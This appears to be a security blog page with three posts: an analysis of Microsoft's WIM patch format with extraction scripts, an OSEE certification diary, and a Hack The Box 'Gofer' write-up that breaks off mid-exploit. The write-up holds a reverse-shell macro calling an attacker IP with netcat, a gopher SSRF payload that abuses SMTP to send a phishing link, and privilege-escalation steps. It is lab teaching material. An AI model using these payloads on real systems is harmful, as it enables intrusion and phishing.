pleasedonthack.me

(At) the WIM of Microsoft - Uncovering Microsoft's Patch Secrets

Mon, 20 Oct 2025 00:00:00 +0000

Following the bits

While patch diffing with PatchExtract.ps1, I encountered a peculiar change in Microsoft’s recent patch releases. They were usually packaged as .cab files but now released as .wim files. What is this file format?

A bit of History

Thankfully there is available documentation of this format. We will be referring to this whitepaper heavily to lay down its design elements. Microsoft’s official whitepaper describes the format as follows:

Windows Imaging Format (WIM): a file-based disk image format introduced in Windows Vista. WIM files are compressed packages containing a number of related files. The format of a WIM file is optimized for maximum compression using LZX, fast compression using XPRESS, or uncompressed.¹

To simplify, a .wim is a file which is mounted to view, like you would a disk, to access the files. Think of it like inserting a CD into an optical drive to view its file contents.

The format was introduced during the Vista days and was used recently for distributing patches sometime in 2024² ³. This change is not exactly problematic as Microsoft is not trying to keep patches out of reach from prying eyes (it did prompt interest to this research). All modern Windows systems have tools to deal with this format such as ImageX (deprecated), dism (which replaced ImageX) and the DISM Powershell Module (which is built on top of DISM). However these tools require Admin privileges as they will mount the file as if it were a disk, hence the “file-based disk image format”.

There are also third party tools which can recognize and can unpack the format, with the more known of these being 7zip and PeaZip. There are scripts such as this shared in ElevenForum by Jen Wolf / jen1-sys and this from winbindex both leveraging 7zip. Of the two archiver utilities, 7zip unpacks faster. There is also wimlib which provides a suite of tools to work with .wim files.

A Closer Look

The WIM File Structure is similar to other formats wherein a header is at the start of the file, followed by the Resource Files and the Metadata Resource, then the Lookup Table. The Resource Files are the actual files we want (e.g. .cab files) and the Lookup Table will tell us where to find them in the .wim file.

WIM Header

The header struct is useful for telling if there are compressed files in the file, where they are located via the Lookup Table and where the Metadata resource is located. Let’s take a look:

typedef struct _WIMHEADER_V1_PACKED
{
    CHAR ImageTag[8];                 // "MSWIM\0\0"
    DWORD cbSize;                     // Header size, always
                                      // 208 bytes
    DWORD dwVersion;                  // Always 68864
    DWORD dwFlags;                    // Describes resources
    DWORD dwCompressionSize;          // Size of wim if compressed
    GUID gWIMGuid;
    USHORT usPartNumber;
    USHORT usTotalParts;
    DWORD dwImageCount;
    RESHDR_DISK_SHORT rhOffsetTable;  // Lookup Table
    RESHDR_DISK_SHORT rhXmlData;
    RESHDR_DISK_SHORT rhBootMetadata; // Metadata resource
    DWORD dwBootIndex;
    RESHDR_DISK_SHORT rhIntegrity;
    BYTE bUnused[60];
} WIMHEADER_V1_PACKED, *LPWIMHEADER_V1_PACKED;

We are mainly interested if dwFlags indicates the following values:

FLAG_HEADER_COMPRESSION                 0x00000002
FLAG_HEADER_COMPRESS_XPRESS             0x00020000
FLAG_HEADER_COMPRESS_LZX                0x00040000

If FLAG_HEADER_COMPRESSION is set in the header, either FLAG_HEADER_COMPRESS_XPRESS or FLAG_HEADER_COMPRESS_LZX will also be set. As we will go over later, Resources also have their own flag to indicate whether they are compressed. The header tells us which compression method was used. It can be either XPRESS or LZX, but there is a third commonly referred to as LZMS for solid WIMs.

Lookup Table

As indicated above, the Lookup Table and Metadata are of type RESHDR_DISK_SHORT:

typedef struct _RESHDR_DISK_SHORT
{
    RESHDR_BASE_DISK Base;
    LARGE_INTEGER liOriginalSize;    // Uncompressed size
                                     // of the resource
}

typedef struct _RESHDR_BASE_DISK
{
    union
    {
        ULONGLONG ullSize;
        struct
        {
            BYTE sizebytes[7];       // Compressed size
                                     // of the resource
            BYTE bFlags;
        };
    };
    LARGE_INTEGER liOffset;
}

RESHDR_DISK_SHORT is composed of another struct, RESHDR_BASE_DISK, which tells us the compressed size, the flags and the location of the Lookup Table/Metadata in the file. Each record in the Lookup Table will include the Resource offset, hash and compression flag:

typedef struct _RESHDR_DISK
{
    RESHDR_DISK_SHORT;
    USHORT usPartNumber;
    DWORD dwRefCount;
    BYTE bHash[HASH_SIZE];          // SHA1
}

As mentioned earlier, dwFlags will tell us if compression was used. Each Resource has an accommodating bFlags variable which is a byte value used to identify if it is compressed:

RESHDR_FLAG_FREE                    0x01
RESHDR_FLAG_METADATA                0x02
RESHDR_FLAG_COMPRESSED              0x04
RESHDR_FLAG_SPANNED                 0x08

If FLAG_HEADER_COMPRESSION is unset, RESHDR_FLAG_COMPRESSED will also be unset.

Metadata Resource

There is a SECURITYBLOCK_DISK struct at the head of the Metadata resource which we can ignore. Each record in the Metadata is described as:

typedef struct _DIRENTRY
{    
    LARGE_INTEGER liLength;                 // Size of this struct
    DWORD dwAttributes;
    DWORD dwSecurityId;
    LARGE_INTEGER liSubdirOffset;
    LARGE_INTEGER liUnused1;
    LARGE_INTEGER liUnused2;
    // File Timestamps
    LARGE_INTEGER liCreationTime;
    LARGE_INTEGER liLastAccessTime;
    LARGE_INTEGER liLastWriteTime;
    BYTE bHash[HASH_SIZE];                  // SHA1
    union
    {
        struct
        {
            DWORD dwReparseTag;
            DWORD dwReparseReserved;
        };
        LARGE_INTEGER liHardLink;
    };
    USHORT wStreams;                        // Alternate
                                            // Data Streams
    USHORT wShortNameLength;
    USHORT wFileNameLength;
    WCHAR FileName[0];
}

For each entry record, we’re mostly interested in:

liLength - Size of the struct which is variable
bHash
wFileNameLength
FileName

The struct is variable in size as Resources can have Alternate Data Streams, a shortname and a filename which are found at the tail end but the minimum size is 0x66 or 102 bytes. Since the FileName is at the end of the struct, it is read by seeking to the very end by adding 0x66 and then reading a WCHAR string of wFileNameLength length. The timestamps are technically unnecessary but handy to date when the .cab files were created and last modified.

Unpacking the WIM

The Lookup Table and the Metadata resource go hand-in-hand to identify the resources inside the .wim. Think of these things as three pieces needed to retrieve or carve the files from the .wim file:

Resource Files	File data
Lookup Table / rhOffsetTable	Contains the offsets and the hash of each resource file
Metadata Resource / rhBootMetadata	Contains the file names and the hash of each entry

The whitepaper describes the file retrieval process as the “Image Apply Process”⁴. While the process is clear enough, we can further simplify it for our purposes:

Get the location of the Lookup Table and the Metadata from the header.
Match the SHA1 from the Metadata with the Lookup Table.
Write the file by combining the data from the Metadata and the Lookup Table.

Inspecting with ImHex

To understand how these pieces work together, we’ll use a hex editor called ImHex. To aid in our investigation exercise, I wrote a pattern file:

If you want to follow along, you can download any recent patch from Microsoft Update Catalog and import the pattern file to Imhex.

We’ll try to understand how Microsoft packages the patch. Let’s look at the header. If we check the flags at offset +0x10, only one flag is set which is FLAG_HEADER_RP_FIX. The meaning of this flag is not important for our purpose. What is important is FLAG_HEADER_COMPRESSION is unset:

At +0x30 we find info on the Lookup Table:

The resource is not compressed as supported by liOriginalSize and sizebytes being equal in value. The former refers to the uncompressed size while the latter is the compressed size. We also see the Lookup Table is located at 0x30a2d304. We can use the liOriginalSize value and the size of struct RESHDR_DISK to compute how many records present in the Lookup Table so liOriginalSize / sizeof(RESHDR_DISK) amounts to 8 records.

At +0x60 we expect to find data on the Metadata resource, however:

There’s nothing there. Is our patch file faulty? Is the metadata missing?

If we drill down FileResources, we will find something interesting at the first resource:

Out of all the resources, the first resource has its RESHDR_FLAG_METADATA set. Why is that?

It turns out this is where Microsoft stored the Metadata resource. Knowing this, we can try to parse this record as Metadata, laying on top this pattern:

struct metadata_resource{
    _SECURITYBLOCK_DISK security_data;
    _DIRENTRY entries[(WIM Header.rhOffsetTable.liOriginalSize/
        sizeof(_RESHDR_DISK))];   
};

Parsing the Metadata

Now that we have both Lookup Table and Metadata resource, we can now piece back together the files packaged in the WIM file.

The Metadata resource is made up of Security Data and Directory Entries. The Security Data is not always present, particularly for patch files. dwTotalLength refers to the struct’s size. If it is only 8, then it is basically empty.

Let’s take a look at boot_metadata -> entries. The dwAttributes variable corresponds to the File Attribute Constants. The first entry is flagged as FILE_ATTRIBUTE_DIRECTORY:

This entry usually corresponds to the parent folder which contains the .cab files. Since we’re only interested in the .cab files, we can skip this entry.

The next entries are of more interest:

This record is flagged as FILE_ATTRIBUTE_ARCHIVE and has the name “DesktopDeployment.cab”.

Since it’s only metadata of the file, we’ll need to look up the offset and size using the bHash:

bHash is a byte array which equals to 89E96B37CC2EE5E6017FF2AB03E399133C65C002.

Aren’t the entries in the Metadata and Lookup table ordered? Unfortunately no, which is why lookups are performed. If we take the hash and match it to a record in the Lookup Table, we locate the offset and size at index 1 of FileResources.

So we can confirm that the file is located just after the header, just as depicted in the WIM structure. We can also see the file is uncompressed.

Putting it all together

We learned how the WIM format works, how to find the files in the WIM file and most importantly how Microsoft ships their patches. We find out they ship them uncompressed. This probably is due to performance reasons. Patch files are enormous and can take up to a few GB of disk space. Compressing is great for saving space but if you’re applying patches decompressing files might consume a lot of resources, driving up CPU and RAM usage. This, on top of unpacking the Patch Storage File (PSF), will not result into a satisfactory experience.

How can we use this information? Now that we know how the format works, we can just retrieve the files using scripts. I wrote two scripts, one in powershell and another in python.

...
class BaseClass{
    $size
    $offset
}
class ResourceHeader : BaseClass{
    ResourceHeader($stream, $readOffset){
        $data = Read $stream $readOffset 0x16
        $this.size = ReadSize $data[0..6]
        $this.offset = ReadValue $data[8..15]
    }
}

class MetaData{
     # 102 is the minimum size of the struct
     # https://github.com/ebiggers/wimlib/blob/master/include/
     wimlib/dentry.h#L17
    $metadataEntryStructSz = 0x66
    $length
    $CreationTime
    $LastAccessTime
    $LastWriteTime
    $SHA1
    $FileName
    MetaData($stream, $readOffset){
        $data = Read $stream $readOffset $this.metadataEntryStructSz

        # Parse metadata record entry,
        # first record is the root record which can be skipped
        $this.length = ReadSize $data[0..7]
        $this.CreationTime = ReadValue $data[40..47]
        $this.LastAccessTime = ReadValue $data[48..55]
        $this.LastWriteTime = ReadValue $data[56..63]
        $this.SHA1 = ReadHexString $data[64..83]
        $fileNameLength = ReadSize $data[100..101]
        $this.FileName = ConvertWideChar $(Read $stream ($readOffset
            + $this.metadataEntryStructSz) $fileNameLength)
    }
}

class Resource : BaseClass{
    $SHA1
    Resource($stream, $readOffset){
        $data = Read $stream $readOffset 0x32
        $this.size = ReadSize $data[16..23]
        $this.offset = ReadValue $data[8..15]
        $this.SHA1 = ReadHexString $data[30..$data.length]
    }
}
...

We create classes modeled after the structs we explored earlier. Then we navigate the file and read these resources to recreate the activity earlier.

...
$resourceHeaders = @{
    rhOffsetTableHeader = $null
    rhXmlDataHeader = $null
    rhBootMetadataHeader = $null
}

$startIndex = 0
$resourceStructSz = 0x32 # 50

# Get resource files
$resourceHeaders["rhOffsetTableHeader"] = [ResourceHeader]::new($fs, 0x30)
log_s "Offset table at $("0x{0:x}" -f $resourceHeaders["rhOffsetTableHeader"].offset)"

# Get XML Data
$resourceHeaders["rhXmlDataHeader"] = [ResourceHeader]::new($fs, 0x48)
$xmlData = BytesToString $(Read $fs $resourceHeaders["rhXmlDataHeader"].offset $resourceHeaders["rhXmlDataHeader"].size)
log_s "XML data at $("0x{0:x}" -f $resourceHeaders["rhXmlDataHeader"].offset)"

# Get Metadata if available
$resourceHeaders["rhBootMetadataHeader"] = [ResourceHeader]::new($fs, 0x60)
if($resourceHeaders["rhBootMetadataHeader"].offset){
    log_s "Boot metadata at $("0x{0:x}" -f $resourceHeaders["rhBootMetadataHeader"].offset)"
}
else{
    log_i "Metadata not included in WIM File. Checking Resource files for metadata."
    $resourceHeaders["rhBootMetadataHeader"] = [ResourceHeader]::new($fs, $resourceHeaders["rhOffsetTableHeader"].offset)
    $startIndex = 1
}

$securityDataSz = ReadSize $(Read $fs $resourceHeaders["rhBootMetadataHeader"].offset 4)

if($securityDataSz -le 8){
    log_i "No boot metadata found. Using the first resource in the offset table."
    $resourceHeaders["rhBootMetadataHeader"].offset += 0x78
}
...

Once we find the Lookup Table and Metadata, we start collecting the file offsets, sizes and timestamps and write the files from the stream to an output directory. Since the files are uncompressed, we avoided implementing any compression algorithm or reliance on third party tools.

To check if we pulled out the files correctly, we manually check the SHA1 hashes and observe they match exactly with the hashes captured in the WIM file.

With some benchmarking, we observe the script is even faster than 7zip:

Measure-Command {& "C:\Program Files\7-Zip\7z.exe" x .\wim.msu -o7ztest}

Days              : 0
Hours             : 0
Minutes           : 0
Seconds           : 1
Milliseconds      : 726
Ticks             : 17260436
TotalDays         : 1.99773564814815E-05
TotalHours        : 0.000479456555555556
TotalMinutes      : 0.0287673933333333
TotalSeconds      : 1.7260436
TotalMilliseconds : 1726.0436

Measure-Command {.\wim.ps1 -Wim .\wim.msu -Destination wimtest}
[+] Magic bytes match WIM signature
[+] WIM File is not compressed
[*] GUID: 35C3305ECFA83CE22B673A79518C202A
[+] Offset table at 0x30a2d304
[+] XML data at 0x30a2d494
[*] Metadata not included in WIM File. Checking Resource files for metadata.
[*] No boot metadata found. Using the first resource in the offset table.
[+] Found file: DesktopDeployment.cab [89E96B37CC2EE5E6017FF2AB03E399133C65C002]
[+] Found file: DesktopDeployment_x86.cab [0884E45A1E35D453368C0E6A730317122E92A10F]
[+] Found file: SSU-26100.3764-x64.cab [2D4713681EA1FB66172EB2DDB1F6BED5D447664B]
[+] Found file: Windows11.0-KB5055523-x64.psf [A343EE70DB22870629EE0BD9F4672D1EF047F077]
[+] Found file: Windows11.0-KB5055523-x64.wim [4C698B7BA1F2F690130D6220EAA998CECD9CCE00]
[+] Found file: onepackage.AggregatedMetadata.cab [757FB964F02D464DC6D9BFE4DDDE161F67DA6C27]
[+] Found file: wsusscan.cab [AA2799D8FC05E1CF64E8E4F0CC517F7FEF62EDAD]

Days              : 0
Hours             : 0
Minutes           : 0
Seconds           : 0
Milliseconds      : 760
Ticks             : 7603211
TotalDays         : 8.80001273148148E-06
TotalHours        : 0.000211200305555556
TotalMinutes      : 0.0126720183333333
TotalSeconds      : 0.7603211
TotalMilliseconds : 760.3211

It’s probably not a fair comparison as 7zip as a more robust tool but for our use case, this is a nice improvement.

Coming Full Circle

I wanted to add this functionality to PatchExtract.ps1 and the more I worked on it, the more I found myself rewriting the original script. The product of this rewrite is Expand-Patch.ps1. It should behave similarly to the original, just with the WIM parsing and some optimizations. The bulk of sorting now occurs during the unpacking of the PSF. I also fixed parsing of the PSF manifest data to occur at the proper offset. The repo can be found here.

I would be grateful if people can check it out and let me know what they think of it. Thanks to Greg Linares (@Laughing_Mantis) and wumb0 for providing these scripts to researchers. Thanks also to wimlib which pointed the way whenever I got lost.

Microsoft, Windows Imaging File Format (WIM) (2007), p. 4 ↩
https://www.reddit.com/r/techsupport/comments/1ij7e77/can_expandexe_still_extract_the_content_of_an_msu/ ↩
https://gist.github.com/wumb0/306f97dc8376c6f53b9f9865f60b4fb5#file-patchextract-ps1-L159 ↩
Microsoft, Windows Imaging File Format (WIM) (2007), p. 5 ↩

OSEE and Me

Fri, 21 Feb 2025 00:00:00 +0000

This is the final post on the “OSXX and Me” series. Checkout the rest:

OSCP and Me
OSCE and Me

Prelude

It was May 2019. Having claimed–the now outdated–OSCE, I set my sights for OSEE. A direct path proved to be elusive. Offsec used to offer AWE/EXP-401 training at Blackhat Asia. It was last offered during the 2019 iteration in April. Options were now limited to expensive trips outside Singapore, usually for BH Las Vegas or Europe. As much as I wanted, it was financially forbidding. I was hopeful for a day it returns and having change to spare for it.

Then the pandemic hit.

Around 2020, Corelan offered its trainings in Singapore. I thought it was a great way to learn Windows Exploitation if EXP-401 never returned. The raging virus ravaged the world delaying the training to 2023.

In late 2023, early bird promos for EXP-401 was announced to my suprise! Even for an early bird slot, the price was almost triple of BH Asia(perhaps the ticket sales were used to pay the rest of the training costs?). It was hard to pass up.

Interlude

Training Week

Training was held in late May 2024 at a nice hotel. I swear putrefied slush streamed from my ears. The food was nice and consoling though.

Nights were spent on exercises. My skill level was inadequate to take on any extra miles. There were students who claimed challenge coins even though they just received the handbook. Having completed all the extra miles by myself, I can say there are students who really really wanted those coins. The instructors also gave out stickers for completing exercises from the text book. I may not have claimed any coins but I was happy to get a sticker.

Training Months

The rest of 2024 was devoted to studying the tome of a text book. During bootcamp, I was up from evening to morning trying to catch up,showing up dazed and hardly attentive for class. Imagine stumbling and divining your way through a cave, and into a circuitous network of keyholes. Outside the bootcamp setting, I was able to rest and to pace myself accordingly. These contributed greatly to my improvement and to my morale. The extra miles–the true exercises of the course–were once thought impossible. Steady progress were made on each until all of them were completed. I enjoyed Browser Exploitation the most and VMWare exploitation the least for the former had targets easy to debug and the latter the most tedious to manage and rebuild.

First Attempt

I booked the exam for November as I wanted to claim the certification before EOY. There were some clues to the challenges in the exam report but prep time was scarce.

On exam day, I assumed the most difficult challenge was the one most unfamiliar to me. I went straight for the second challenge. It was a grave mistake. By the end of the third day, I only solved the second challenge and did not complete the first. Even though it only amounted to half of the requirements, I still wrote the report. The next day, the failure result came but not for an incomplete report. It turns out I failed to upload the report properly. My mind was mushed soup, barely contained by the bowl I called a head.

Second attempt

I took the exam again in January. Having already done the second, I poured my efforts into the first. Perhaps in any walk of life, good recon will net the necessary edge to overcome any situation. Most of the time was consumed in RE, to cover more ground than my previous attempt. The solution I came up with was unconventional; I was unsure if it was the intended solution. Hacking is a pragmatic science, I suppose? Despite having doubts, the exploit worked and fulfilled the necessary objectives. To salve my conscience, I made sure to use the remaining time collecting data and screenshots and prepping the report. After rest on the fourth day, I wrote and submitted the report the morning after and reported in for work. And yes, this time I was able to upload the report properly.

Postlude

The course is a newer version of AWE, the materials updated and released back in 2023 to my knowledge. I have no reference point as this is my first time taking it but I can finally say I now have some idea what a primitive means. It’s such a vague term for me, pinning down what it exactly means is as elusive as its etymology. zardus formulates it in the most digestible form I’ve found. Anyway, the materials were a joy to study on their own. Having said this it still shows its age in some parts even though it was refreshed. Corrections to the labs reported by students are missing from the materials. They enable the conditions for the exploits to work properly, instead of making the extra miles easier. I’m unsure why they are yet to be added.

I’m also unsure if the steep price is proportional to the value of the service you’re getting. This course is unlike any other in Offsec’s catalog: no videos, no recordings. You get a text book, PoC code and VMs for practice. Purchasing the course and viewing exam results are unavailable in the student portal. I can understand the former but the latter? Not so much. This is my latest, and probably my last, Offsec course so I was pleasantly surprised the exam results are now shared to students. The pleasantness faded as soon as I discovered AWE is yet to receive the same treatment.

When “Try Harder” is not enough

The instructors, while they constructed and provided excellent material, were unresponsive to inquiries. At the end of the bootcamp they gave out their contact details. From the emails I sent, only the first one received a reply. I would have appreciated hearing from and interacting with them. There is also a private discord channel for students and instructors; it’s often too quiet. You’re lucky to get a reply.

From a student.

This is problematic as students have no obligation to help. Perhaps its par for the course. After all this is Offsec.

The result is given out within ten business days. It seems there are two types of vocal students: those who get their result in 24 hours and those waiting out the 10 days, if not more. Those who wait 3-6 days or a week might have no gripes. The unenviably unlucky ones endure 10 or more days. Unable to act or plan immediately, they are forced into stasis. Ten days might seem fair, but considering the total time investment makes it unpalatable. For AWE, the exam is 4 days. Adding the waiting period, 2 weeks. Imagine a student receiving a failing result after investing 2 weeks, and potentially another 2 weeks for the retake.

That’s a month.

The total hikes up further if we consider slot availability. After all, it’s not always easy to line up 4 back to back, open days. Students will probably forgo other plans. They can’t simply “try harder” their way out. This might happen to the unluckiest of students but I think there are students who can strongly relate. For my second attempt the result came after 10 business days. With the exam the ordeal was 18 calendar days. It is difficult for me to write about this as part of me thinks “It’s okay to be patient and to wait”. Part of me also thinks “Is it unreasonable of me to feel so uneasy with the amount of time and money invested in this?”

The current syllabus is at odds with the credentials description:

Preventing ASLR was not tackled in the course. The course placed focus on obtaining info leaks and converting them into useful primitives.
EMET is long gone as of this writing. It was used as supplementary material for WDEG but not a focal point.
We mostly used 64 bit

Probably for the sake of previous holders, Offsec kept the same details for newer holders. It’s a shame since newer holders will have to contend with displaying an outdated version of their achievement. An OSEE/OSEE+ split might be unonscionable; simply thinking about it gives me shivers.

Offsec has been around for a while, they must receive similar feedback in some form or another. If not, I hope they consider this post in improving the learning experience of their students. Despite the remonstrances, I am thankful to them for creating wonderful courses and for helping me advance my career. There’s still a lot to learn. Thanks to Offsec, I may be able to go the distance with new found skills and experience. If ever I am interested in any of their new content I will check them out. Though I cannot take nor recommend them without reluctance.

What’s Next?

My backlog is swelling and there are some things I’ve been wanting to post for some time now. I’ll come out with technical content to make up for the lack in this post. As for certs, I have some pushed aside so I’ll continue pursuing them. Thanks for visiting my blog. Please look out for more posts.

HTB Gofer

Tue, 01 Aug 2023 00:00:00 +0000

Intro

Hey. It’s been a while. Here’s a post. Trying to mix things up a bit with a ctf writeup. It’s heavy on screenshots and if you notice any anachronisms it’s because the screenshots are from the future. Just kidding. I went back and forth to get more for illustration.

Recon

Let’s start with a simple scan:

First, we can see port 80 which is associated with domain name gofer.htb. Let’s put that in our /etc/hosts file later. Second Samba is also available, noticeably with a version vulnerable to Sambacry. Looks like low-hanging fruit and I did make an attempt just to make sure. As this is a “Hard” box, doors won’t easily open. Finally there’s port 25 which is filtered and ssh which will come into play later on.

As usual of HTB fare, it’s a webapp. It’s quite minimal which tells us we don’t need to spend much time gawking at its design. I did go through any functionality that might be of interest. There’s the map and message box. But the message box was broken (ie no target for the form action) and I already know where I am.

There’s info about the fictional employees though. That will come in handy later on.

Samba

What’s in the smb shares? Well there’s a folder named shares. Quite prosaic.

Some mail is backed up. Going through it, we’ll find the setup for this challenge:

From jdavis@gofer.htb  Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
        by gofer.htb (Postfix) with SMTP id C8F7461827
        for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his 
habit of clicking on links without paying much attention may be 
problematic one day. That's why from now on, I've decided that 
important documents will only be sent internally, by mail, which 
should greatly limit the risks. If possible, use an .odt format, 
as documents saved in Office Word are not always well interpreted 
by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy 
but if you could restrict access, it will be more secure until 
you have finished it. It seems to me that it should be possible 
to do so via <Limit>

A security threat.

Seems like someone is skipping their cyber awareness training. She(or he?) will lend us a helping hand gaining a foothold. Let’s craft that .odt document!

ODT Macros

There are guides like this one and this one for this part.

With the document prepared, I sent the email to Jocelyn. The mail address jhudson@gofer.htb was easy enough to guess as it takes after the other known email addresses (e.g. jdavis@gofer.htb). The command to send is:

mutt -s "Hello Jocelyn!" -a test.odt -- jhudson@gofer.htb

But you can’t send emails. Remember, port 25 is filtered.

Well that sucks. Now what?

Recon pt. 2

We’re going to make use of a hackers’ most powerful recon tool in his arsenal:

Nah, no begging. Let’ go back to the email. There’s supposedly a proxy in the works, but where is it? That’s what we need to find right now. Let’s fire up our discovery tools.

wfuzz -Z -w /home/jerowin/Documents/htb/Machines/dynstr/subdomains-top1million-
110000.txt --hc 400,404 -u http://gofer.htb/ -H "Host: FUZZ.gofer.htb" --hl 9

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://gofer.htb/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000000084:   401        14 L     54 W       462 Ch      "proxy"                                                                                                                      

Total time: 161.1278
Processed Requests: 114441
Filtered Requests: 114440
Requests/sec.: 710.2496

The first rounds of discovery didn’t turn up much. No additional paths were discovered so we need to see if there are subdomains. For this part, be mindful of the /etc/hosts file. Only domains associated with the target IP will be resolved. Since we don’t know the subdomain yet, we need to use a technique to check. Fortunately we can fuzz through the Host header. We hit a subdomain named proxy.

Okay, we avoided defeat this time. But we’re not yet out of the woods. Notice that our fuzz returned HTTP 401. That’s not good. We’re locked out and this was our only lead up until recently. Being a proxy, there might be a way to probe it deeper, but how? For that we’ll need to fuzz further:

After several rounds of fuzzing I was somewhat ready to call it a day but then I noticed something interesting. There are some methods not implemented. That could be an interesting venture. What if we paired it with path/file discovery?

Wow, we actually found something. Turns out there are some specific methods not implemented. But any other method will do:

If you're wondering, no this is not a reskinned burpsuite. Check out caido which is sublime for burp I guess?

Turns out I can substitute any method name as long as it is not TRACE or CONNECT. We found our next entry point index.php! And it seems to require a URL parameter. What if we were a bit naughty with this parameter?

Cool, we got ourselves SSRF. But this is Gofer right? There must be some sense to this challenge with that kind of name. So we’ll need to make use of SSRF w/ gopher protocol.

SSRF w/ gopher

Looking at this, there’s something we can try which is a synthesis of details we’ve gathered:

The machine name
Email is only available internally, as evidenced by port 25 being filtered and the backed up email
Someone who likes to click links from emails
Support for ODT documents via Libreoffice.

So our plan of attack may look something like this

Create an ODT document w/ a malicious macro (Done)
Edit the macro to create a reverse shell to a netcat listener
Serve the document via http server (Done)
Trigger SSRF via the Proxy + gopher protocol
Target the SMTP service to mail Jocelyn a link to our ODT document.

We will use this macro:

REM  *****  BASIC  *****

Sub Main
	Shell("nc 10.10.14.114 4444 -e sh")
End Sub

After the change, we need to craft the SSRF payload to talk with the SMTP server. Let’s see how this can be done. We need to check if gopher is actually available:

Looks like there’s a blacklist in place. Fortunately, there are countless ways for us to try and overcome this (check out this guide). Here is a payload we can try

TEST /index.php?url=gopher://2130706433:25/xHELO%20gofer.htb%250d%250a
MAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@
gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker
@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate
%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject
%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20
magic%20word%20%21%20<a+href%3d'http%3a//10.10.14.114:8000/test.odt>
this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

For legibility let’s decode it.:

gopher://2130706433:25 # 127.0.0.1 converted to decimal.
		       # Don't worry, it's RFC compliant!
/xHELO gofer.htb%0d%0a # SMTP commands to send the email
MAIL FROM:<hacker@site.com>%0d%0a
RCPT TO:<jhudson@gofer.htb>%0d%0a # Our target's mail address
DATA%0d%0a
From: [Hacker] <hacker@site.com>%0d%0a
To: <jhudson@gofer.htb>%0d%0a
Date: Tue, 15 Sep 2017 17:20:26 -0400%0d%0a
Subject: AH AH AH%0d%0a
%0d%0a
You didn't say the magic word ! <a href='http://10.10.
14.114:8000/test.odt'>this</a>%0d%0a # A hyperlink via HTML
%0d%0a%0d%0a.%0d%0a
QUIT%0d%0a

Remember Jocelyn likes links so we included a link to our ODT document. If everything was written just right, sending this payload will trigger the SSRF:

Okay I didn’t just show you the same screenshot twice, notice that we obtained a shell. Great.

The Route to Root

Sorry for the pun. Couldn’t help myself. Anyway. Now that we have a foothold, we need to make ourselves root. Let’s do some more recon:

A good escalation point would be to look at the available files with SUID. After a quick look around we have some files with sticky bits. What stands out the most is the notes binary that can only be executed by root or someone from dev.

Currently we are not in the same group as Tom who is from dev. We’re in netdev otherwise known as the “the hacker’s wet dream” department. Anyway, we’ll need to access the dev group somehow, but how? Looking around, we have access to the credentials for the proxy earlier. Maybe we can crack it?

Nah, crack that. No easy wins for challenges like these. Let’s probe further.

We can see a lot of traffic coming in for HTTP. Curiously though, we can see some being made internally from 127.0.0.1. Running linpeas, we’ll get some interesting info. We can use tcpdump.

tcpdump -i lo -A

Seemed like a longshot to be honest. When you run linpeas, you know you’re out of options by that point. But then again it’s prudent to use tools when covering bases.

At first glance, I thought this came from people trying to bruteforce the proxy. But then again I am sniffing the loopback interface so this clearly came from inside. When we decode the creds, we get Tom’s creds!

rax2 -D dGJ1Y2tsZXk6b29QNGRpZXRpZTNvX2hxdWFldGk=
tbuckley:ooP4dietie3o_hquaeti

When you crack the creds from htpasswd, hashcat -m 1600 hash decoded, you’ll get the same creds. All that’s left is to leverage the notes binary.

Lazy RE

I usually use a disassembler/debugger for this part but decided against it. The binary was easy to understand by simply playing around with it.

This binary basically just creates users and notes that only exist while it’s running. A user is given the user role by default. Option 8 is reserved only for users in the admin role. But there is no option to switch/assign/create this role.

Looking at the strings output we can see certain lengths for username and notes, 23 and 39 respectively.

Interestingly, we can see tar -czvf /root/backups/backup_notes.tar.gz /opt/notes which can be hijacked. But by default this is only reachable via Option 8. This is the puzzle we must solve.

Let’s produce some patterns:

ragg2 -P 24 -r

If we try exceeding the buffer with our input, we can observe the Role buffer was modified.

tbuckley@gofer:~$ notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 1

Choose an username: test

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 2


Username: test
Role: user

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 4

Write your note:
test
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 3

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 2


Username: 
Role: user

========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 4

Write your note:
AAABAACAADAAEAAFAAGAAHAA
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 2


Username: AAABAACAADAAEAAFAAGAAHAA
Role: 

========================================
1) Create an user and choose an username
2) Show user information
